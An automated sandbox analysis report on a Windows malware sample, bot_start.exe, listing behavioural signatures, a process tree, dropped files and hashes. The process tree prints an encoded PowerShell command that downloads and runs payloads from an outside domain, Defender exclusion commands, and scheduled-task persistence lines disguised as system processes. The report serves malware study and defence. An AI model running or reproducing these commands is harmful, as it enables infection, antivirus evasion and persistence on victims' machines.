Analysis
-
max time kernel
63s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
23-05-2024 03:07
General
-
Target
bot_start.exe
-
Size
2.5MB
-
MD5
62dec8c537e3aa76b294ab744b20d245
-
SHA1
1f4ec4852cd84d32a0d26ba0e163a373811eaebd
-
SHA256
cc97b59379bc6eafe5c5c9dc66f16d4795270e01dce613652359bc852ba0665a
-
SHA512
f47bbf3260f0124ec947b3a37ce316700481a8c4d5d984c9012df85673eb0d2c8777396e5a957cfc900ed509045e50d196558e931a84df146115e950abd8f6a7
-
SSDEEP
49152:SNkG6I1nPFf56dv26ot3VwBtF+kze3xqH1Hm4I6qxOli96Jyn5tzEde3Yx:S/fP9se6ot3VwBtF+kzeQHMdLcK6EtzY
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 9 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 34 IoCs
-
Suspicious use of SendNotifyMessage 32 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bot_start.exe"C:\Users\Admin\AppData\Local\Temp\bot_start.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbgB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABlAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBrAGkAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGsAbgB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBzAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcAB6AGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAcwB5AHUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHkAcgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAByAHQAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAGUAagBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGUAZQBrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAegB6AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGYAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBuAGEAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBjAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAZQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAYwByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAcAB3AGQAKQAuAHAAYQB0AGgAIAA8ACMAaQBpAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBhAGkAbgAuAHAAeQAnACkAPAAjAHUAdwB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAbQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHgAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQA8ACMAbABqAHEAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\spoolsv.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\My Music\csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\wininit.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X7BaSFvUpn.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
C:\Program Files (x86)\Common Files\wininit.exe"C:\Program Files (x86)\Common Files\wininit.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\main.py3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\main.py"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Default User\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\My Music\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Documents\My Music\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef0549758,0x7fef0549768,0x7fef05497782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1188 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2140 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2148 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2636 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2336 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3468 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3592 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3588 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3724 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3800 --field-trial-handle=1380,i,14099346863454851464,350149897828816585,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D9635DAB-DA59-4A7A-B5BC-C22FA755CD64} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD57fe46d0da192b03aa1441ce5c050080e
SHA1d5c2a5108b1d9c791e4949d777405254be632dec
SHA256716a4488c581c65ebdf36b32f378ccccfc69953d9323413f3f45a7c0d0b39521
SHA5122c42f5a63ffb5c3abc24969ad321afaeb71bccaa7ca8f0c21878598d30ecb85743107b3d891d0a23f528537605fc16f5121bdff6ea1a81ccaff572f9096f2ad8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmpFilesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
5KB
MD5d5c044b6af9d80b4d28fba82ef51e391
SHA127cd5c1753df2ee84f6fc9e6b7210db34899842d
SHA256cc2b74c109cb654ac622e18db8d048a7e855a155eae4e125854c4a057d48a743
SHA512abffad212a994b1748df963eae67d171f3e99c3dfb615276328e18edea647559fc23d12be3a67f209a937f7b50e3d073a96d4b349a074801d148f7c380f45d30
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
5KB
MD5baf70739c8f00d82e89c6ae26ddd7ad6
SHA1815ac591554e3952a85b5261135fa8ad9e28368f
SHA25615a2e1927137d6e97c0f75d0bf88198394da41ae8d10d10ae1baadc26a693d5e
SHA51299f1a6088cf57ab1a2df5268d6d5ae97b1e73db2cca60558fba682ccb8b8fb5a8ae27a193213502124a96fc999dfa67405575a130d873f11466f2fd8ed77b40b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000007.dbtmpFilesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
271KB
MD555156a668ae39e53501fecaeb8fb6fb9
SHA1bd88c77d4affd9cc4fa717da1f0c1d8b877c06ee
SHA2561412fff8ef6f71420dab12ac729915291699d845adf64f6f77e6ba8f8a8c2413
SHA512d4c369e201cef2dc88d27bb0981ef47e163630a09a4d35196d52be88a36ee7c4d39f6687a35d36f6f5057896abb09f3c107ab7abb9bb6ab65763b9232a18a3e6
-
C:\Users\Admin\AppData\Local\Temp\Cab2A9B.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar2B9C.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Local\Temp\X7BaSFvUpn.batFilesize
175B
MD5d5c7410d277b9a4c9d4fbfe1d7da64ea
SHA1e3cfb36e75f9001cc06ddb4b7942e55363f1b9d9
SHA25617d737861c96819b9d863ecc1d2f546034f167418b698ca453dd44f9aef852a3
SHA5120be7dbbf438c7f44630d24e8299cc9bb4ba62816e4c687d17880269500fbd08122bfde826dfe1e7ae0c88106ebcb23e06962bd2f3eda3ed26c9ec717bbd58416
-
C:\Users\Admin\AppData\Local\Temp\main.pyFilesize
5KB
MD5aa214e7b8696382bdc34b4122f001cfc
SHA18eb821b861487e9a508f405db163a2c5e12cb3f2
SHA256484efff3a213de2098b2943b80b4520f459bc74b253f78be03c3b6c32a22b747
SHA512806793ba81621fba580fcc51032a381c5625e3c1602ec57ef063bc99bc57e11d10a21cbec4f0099d46736e9b9f26b04f542b994a2ac6ad020fd3f1d083499c68
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C4RS11ZM3PDO5WFY5MXF.tempFilesize
7KB
MD5c0ff676777a57f468f9ef61a819d348c
SHA1e89bef0285da9e50f7b41276316f733ba8b438a1
SHA2569384500cb40308e7f5c6713fc38f84c95df1edb76c37070203a614ac2ae0634a
SHA512df86c7f0aad5d49e9780a43a8c56e453029eda073e2fcd51f931b95440f002d1179271cd3c1c54effbe5893dc605fd7a1fcd37a87e3997b129cc78ab59ca4e36
-
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exeFilesize
1.5MB
MD57a4073a468cf2d6ae2836893f467c81d
SHA1ff54a200d4f6a1a696182f2cfde6e735b2580f37
SHA256af6a3a206daa66c291daac3dc17f29dd7d0e1504a92b6346b5c5fa252dcc3ef5
SHA5128df794241d4162850b5243b0844b3818a6ff010f2dda65bdae3a88a69e6f368c700c81997d781568652cb3b42ec98bd5d25ba86fec7d3b7a5856d459dba3bdd5
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Roaming\VC_redistx64.exeFilesize
2.4MB
MD5503e036a0d5f079e8fcdff5e82de8b59
SHA105bb2612246d6f71b68980e8a5eef12d17791229
SHA2569741a43016568fa3fd861cc38c18140f5ba1375ede80d9e41c10d473853aa1c9
SHA512769483bb10856130586f79fbfa25d94dc1db997f1c1a336e8535d2b28d733cd73abb9b2ae48040fc81d8f7ff6d11f0eeba97aa44e0fb05ff9aefbc6b74155b68
-
memory/768-308-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/768-333-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/768-279-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
